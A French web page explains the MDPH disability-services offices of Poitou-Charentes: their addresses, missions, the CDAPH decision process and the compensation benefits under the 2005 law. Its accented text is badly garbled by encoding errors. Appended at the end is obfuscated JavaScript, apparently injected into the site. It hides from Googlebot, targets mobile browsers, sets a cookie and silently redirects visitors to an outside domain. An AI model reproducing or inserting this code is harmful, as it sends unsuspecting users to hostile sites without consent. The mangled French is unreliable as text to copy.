Les Maisons DA�partementales des Personnes HandicapA�es (MDPH) sont des Groupements da��IntA�rA?t Public qui associent le Conseil GA�nA�ral, la��Etat, les organismes de protection sociale dans le champ du handicap.

Leur rA?le est, dans un lieu unique, da��informer et da��aider les personnes handicapA�es.

Il y a une MDPH dans chaque dA�partement, lequel assume la responsabilitA� administrative et financiA?re.

 

CoordonnA�es des MDPH du Poitou-Charentes:

 

CharenteA�:

MDPH 16
15 boulevard Jean Moulin, Ma Campagne
16000 AngoulA?me
08 00 00 16 00

Charente maritimeA�:

MDPH 17
2 rue Victor Hugo, A�BP 50145
17005 La Rochelle Cedex 1
08 00 15 22 15A� ouA� 05 46 07 80 00

 

Deux-SA?vresA�:

MDPH 79
37 rue du Vivier, BP 80105
79004 Niort Cedex

08 00 40 02 24

VienneA�:

MDPH 86
39 rue de Beaulieu
86000 Poitiers
08 10 86 20 00

 

Missions des MDPHA�:

  • Accueillir, informer et conseiller les personnes handicapA�es et les accompagner dans la formulation de leurs demandes et de leur projet de vie
  • Evaluer le handicap et le besoin de compensation
  • Organiser le fonctionnement de la Commission des Droits et de la��Autonomie des Personnes HandicapA�es (CDAPH) pour dA�cider de la��accA?s aux droits, prestations et dispositifs sociaux ainsi que de la��orientation de la personne
  • Instruire les procA�dures de conciliation ou de mA�diation
  • GA�rer le Fonds DA�partemental de Compensation du Handicap

 

Fonctionnement de la Commission des Droits et de la��autonomie des Personnes HandicapA�es (CDAPH)A�:

  • Toute personne qui rA�pond A� la nouvelle dA�finition du handicap (1) peut demander A� la A�A�MDPH da��A�tablir un plan personnalisA� de compensation et une A�valuation des besoins.
  • Ca��est le travail de la��A�quipe pluridisciplinaire qui A�value les besoins et propose un plan de compensation.
  • Ce plan est transmis A� la��intA�ressA� qui doit impA�rativement dans les 15 jours prA�ciser sa��il est da��accord.
  • A ce stade, il ne sa��agit que da��une propositionA�: ce sera la CDAPH qui notifiera la dA�cision aprA?s avoir examinA� la proposition de la��A�quipe pluridisciplinaire ainsi que les observations transmises par la personne concernA�e en cas de contestation.

A�

(1)A�A�A� Constitue un handicap toute limitation da��activitA� ou restriction de participation A� la vie en sociA�tA� subie dans son environnement par une personne en raison da��une altA�ration substantielle, durable ou dA�finitive da��une ou plusieurs fonctions physiques, sensorielles, mentales, cognitives ou psychiques, da��un polyhandicap ou trouble de santA� invalidant.

 

Formulaire unique de demande(s) auprA?s de la MDPHA�:

Ce document, que vous pouvez obtenir auprA?s de la MDPH ou sur internet, est A� utiliser pour toutes les demandes en lien avec votre situation de handicap ou celle de votre enfantA�. Il est A� remplir minutieusement, la��AFTC de votre dA�partement peut A�ventuellement vous apporter une aide si besoinA�, en particulier en ce qui concerne le projet de vie de la personne concernA�e.

Droit A� compensation du handicap

La loi NA� 2005-102 du 11 fA�vrier 2005 pour la��A�galitA� des chances, la participation, la citoyennetA� des personnes handicapA�es apporte des A�volutions fondamentales pour rA�pondre aux attentes des personnes handicapA�es.

Elle met en A�uvre le principe du droit A� compensation du handicap en A�tablissement commeA�A� domicile.

« Le projet de vie, ca��est construire la vie de demain avec les repA?res da��hier et les moyens da��aujourda��hui. » ( Docteur Philippe Colbeau Justin).

Le droit A� compensation tel que dA�fini dans la loi du 11 fA�vrier 2005 est une avancA�e importante, voire capitale qui trouve ses fondements dans la notion dea��projet de vie.

Celui-ci sera A�laborA� A� partir des aspirations formulA�es par la personne handicapA�e, son entourage ou son reprA�sentant lA�gal selon qua��elle pourra, totalement, partiellement ou pas du tout exprimer des dA�sirs et un avis cohA�rent.

Cette expression A�tant recueillie, tout commencera concrA?tement, dans le cadre de la MDPH, par la��A�valuation des besoins de la personne.

Ca��est A� une A�quipe pluridisciplinaire rA�unissant des mA�decins, des assistantes sociales, des psychologues, des ergothA�rapeutes et, A�ventuellement, des travailleurs sociaux, ainsi que des professionnels aux compA�tences dA�diA�es que sera confiA�e cette tA?che.

Les dA�sirs exprimA�s, les informations rassemblA�es et les avis recueillis pourront, le cas A�chA�ant, dA�boucher sur des expertises plus approfondies qui A�valueront les degrA�s da��autonomie et permettront da��optimiser le choix et les possibilitA�s, ou de vie dans un milieu autonome, avec les amA�nagements nA�cessaires, ou da��accueil dans un A�tablissement plus ou moins spA�cialisA�.

AprA?s cette A�valuation la��A�quipe pluridisciplinaire proposera un « Plan personnalisA� de compensation » qui devra A?tre aussi proche que possible du projet de vie A�laborA� par le handicapA� tout en restant adaptA� aux contraintes psychologiques et techniques imposA�es par le handicap spA�cifique.

AprA?s discussion avec la personne handicapA�e et validation par elle, et-ou avec ses proches, de ce Plan personnalisA� de compensation, le projet A�sera soumis A� la Commission des Droits et de la��Autonomie des Personnes HandicapA�es pour dA�cision.

.Les dA�cisions de la C D A P H seront motivA�es et prA�ciseront la��A�tendue et la durA�e des droits ouverts.

Le Plan personnalisA� de compensation respectera un projet de vie « rA�aliste » en rA�pondant aux aspirations et aux besoins:

  • aides diverses, individualisA�es, da��accompagnement A� domicile.
  • aides de substitutions spA�cialisA�es pour les actes administratifs et de gestion.
  • Aides matA�rielles en A�quipements et au transport.
  • Organisation de scolaritA� assistA�e.
  • Orientations scolaires et professionnelles adaptA�es.
  • Etc.a��

Une attention particuliA?re sera apportA�e aussi bien aux handicaps multiples ou complexes qua��aux handicaps A� faible prA�valence, trA?s souvent incompris dans leurs formes da��expression et mA?me quelquefois inconnus.

Les prestations accordA�es par la MDPH pourront A?trea��:

  • La PCH, Prestation de Compensation du Handicap, A� domicile ou en A�tablissement; elle na��est pas soumise A� condition de ressource et permet de prendre en compte, au-delA� des aides humaines, la��ensemble des besoins de la personne handicapA�e.
  • Les aides humaines (auxiliaires de vie, tierces personnes, aidants familiaux).
  • Les aides techniques (fauteuils, prothA?ses, accessoires, maintenance du matA�riel)
  • Les amA�nagements de logement et de vA�hicule.
  • Les aides animaliA?res.
  • Les aides spA�cifiques ou exceptionnelles non dA�crites.

Les dossiers de projet de vie peuvent A?tre discutA�s devant la commission de la MDPH et en cas de dA�saccord A?tre soumis A� un conciliateur.

Les dA�lais de traitement sont da��environ 4 mois.

A�

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}